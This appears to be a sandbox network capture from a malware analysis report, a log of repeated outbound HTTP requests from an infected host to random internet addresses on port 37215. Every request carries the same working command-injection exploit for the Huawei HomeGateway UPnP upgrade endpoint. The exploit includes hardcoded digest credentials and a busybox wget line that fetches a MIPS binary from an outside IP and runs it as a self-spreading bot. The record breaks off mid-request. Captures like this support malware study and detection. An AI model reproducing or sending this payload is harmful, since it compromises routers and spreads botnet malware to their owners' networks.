6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  544192.168.2.1345602157.217.220.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.122509956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  545192.168.2.1355410197.108.114.13737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.122519016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  546192.168.2.1356764197.117.240.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.122541904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  547192.168.2.135440041.226.129.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.122551918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  548192.168.2.136058871.2.142.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.123130083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  549192.168.2.1358092135.89.244.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.123132944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  550192.168.2.1356648157.111.123.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.123161077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  551192.168.2.133330641.226.145.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.123162031 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  552192.168.2.1338394157.49.98.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.123224020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  553192.168.2.1354090175.55.10.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.123253107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  554192.168.2.135626441.158.48.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.123255968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
